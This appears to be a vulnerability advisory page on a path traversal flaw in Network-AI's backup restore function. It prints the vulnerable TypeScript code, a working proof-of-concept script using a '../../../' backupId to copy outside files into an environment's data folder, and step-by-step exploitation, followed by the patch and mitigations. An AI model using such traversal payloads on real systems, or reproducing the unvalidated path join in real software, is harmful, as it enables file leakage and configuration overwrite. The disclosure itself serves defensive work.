Network-AI, Path Traversal, CVE-2025-12345 (Medium) -DC-Jun2026-530

By /

Listen to this Post

The vulnerability exists in the `EnvironmentManager.restore()` method of Network-AI versions prior to 5.12.2. This function is responsible for restoring environment backups from a specified backup ID. The core issue lies in how the backup path is constructed and validated.
When `restore(env, backupId)` is called, it computes the backup path by joining the environment directory with a `.backups` subdirectory and the user-supplied `backupId` string. The method only checks whether the resulting path exists on the filesystem using existsSync(). It does not perform any path resolution or containment verification to ensure that the resolved path remains within the intended `.backups` directory.
An attacker can supply a traversal payload as the backupId, such as ../../../outside/source-dir. Because the path is constructed via simple string concatenation and no sanitization is applied, the resulting `backupPath` can point to any directory on the filesystem that the process has permissions to read.
Once the path is accepted, `_collectBackupFiles()` enumerates all files under the attacker-controlled directory. For each file, the code copies it from the source path into the target environment data directory, preserving the relative path structure. This effectively allows arbitrary files from outside the backup directory to be copied into the environment’s data folder.
The default CLI exposes this functionality through the command network-ai env backup restore --env <env> --backup <id>, making the vulnerability reachable via the standard interface. The affected source files are `lib/env-manager.ts` (lines 474-499) for the vulnerable path construction and copy logic, and `bin/cli.ts` (lines 441-458) for the CLI exposure.
The provided Proof of Concept demonstrates the attack by creating a temporary directory structure with a source file outside the backup path, then using a traversal backup ID to copy that file into the target environment, successfully overwriting or injecting configuration files.
The maintainer patched this vulnerability in version 5.12.2 by validating the `backupId` against a strict alphanumeric regex (/^[\w\-]+$/) and asserting that the resolved path remains within the backups directory before any filesystem operations occur.

DailyCVE Form:

Platform: ……. Network-AI
Version: …….. 5.12.1 and below
Vulnerability :…… Path Traversal (Directory Traversal)
Severity: ……. Medium
date: ………. 2026-06-19

Prediction: …… 2026-06-20

What Undercode Say:

Analytics of the vulnerability shows the following key technical indicators:
– The attack vector is local filesystem access via the CLI interface.
– The vulnerability requires the attacker to have permission to invoke the `restore` command.
– No authentication bypass is involved; the attack relies on path traversal.
– The PoC successfully copies arbitrary files into the target environment.
– The patch introduces both input validation and resolved-path containment checks.
– All 3,269 tests passed after the patch, indicating no regression.

Check installed version
npm list network-ai
Verify vulnerable path construction (pre-patch)
grep -n "const backupPath = join(backupsDir, backupId)" lib/env-manager.ts
Test for traversal vulnerability (PoC)
TMP=$(mktemp -d)
TMPBASE="$TMP" node -r ts-node/register/transpile-only - <<'TS'
const { EnvironmentManager } = require('./lib/env-manager');
const fs = require('fs');
const path = require('path');
const base = process.env.TMPBASE;
const data = path.join(base, 'data');
const source = path.join(base, 'outside', 'secret-src');
fs.mkdirSync(source, { recursive: true });
fs.writeFileSync(path.join(source, 'trust_levels.json'), '{"leaked":true}');
const mgr = new EnvironmentManager(data, {
chain: ['dev', 'st'],
gates: { dev: 'auto', st: 'auto' },
});
mgr.init('dev');
const backupId = path.relative(path.join(data, 'dev', '.backups'), source);
const result = mgr.restore('dev', backupId);
const restored = fs.readFileSync(path.join(data, 'dev', 'trust_levels.json'), 'utf8');
console.log(JSON.stringify({ backupId, filesRestored: result.filesRestored, restored }, null, 2));
fs.rmSync(base, { recursive: true, force: true });
TS

// Vulnerable code snippet (lib/env-manager.ts:474-499)
restore(env: EnvName, backupId: string): RestoreResult {
const envDir = this.getDataDir(env);
const backupsDir = join(envDir, '.backups');
const backupPath = join(backupsDir, backupId);
if (!existsSync(backupPath)) {
throw new Error(<code>Backup '${backupId}' not found for environment '${env}'</code>);
}
this.backup(env);
const files = this._collectBackupFiles(backupPath);
let restored = 0;
for (const rel of files) {
if (rel === '_manifest.json') continue;
const src = join(backupPath, rel);
const dst = join(envDir, rel);
try {
mkdirSync(join(envDir, rel.includes('/') ? rel.substring(0, rel.lastIndexOf('/')) : '.'), { recursive: true });
copyFileSync(src, dst);
restored++;
} catch { / skip / }
}
return { backupId, env, filesRestored: restored };
}

Exploit:

The exploitation process is straightforward:

1. Identify a target environment (e.g., `dev`).

  1. Craft a traversal `backupId` that points to an external directory containing desired files.
  2. Invoke the `restore` command via CLI or direct API call.
  3. The vulnerable code copies all files from the external directory into the target environment’s data directory.
  4. This can overwrite existing configuration files or inject new ones.
    The PoC provided in the uses a temporary directory setup to demonstrate the attack without affecting real systems. The observed result shows backupId: "../../../outside/secret-src", filesRestored: 1, and the restored content {"leaked":true}, confirming successful file injection.

Protection:

To protect against this vulnerability:

  • Upgrade to Network-AI version 5.12.2 or later immediately. Run: 
    npm install [email protected]
  • If immediate upgrade is not possible, apply the following mitigations:
  • Restrict access to the `network-ai env backup restore` command to trusted users only.
  • Implement input validation on the `backupId` parameter to reject any string containing path separators (/, \, ..).
  • Use filesystem-level permissions to limit the directories readable by the Network-AI process.
  • The patched version validates `backupId` against `/^[\w\-]+$/` and ensures the resolved path remains under `.backups` before any operations.

Impact:

  • An attacker with the ability to invoke backup restore can copy arbitrary readable directories into data/<env>.
  • This can stage sensitive files into environment data/backup locations.
  • It can overwrite environment configuration files if matching filenames exist in the source directory.
  • Environment isolation is broken, potentially leading to data leakage or privilege escalation.
  • No Remote Code Execution (RCE) chain was confirmed in the disclosure.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top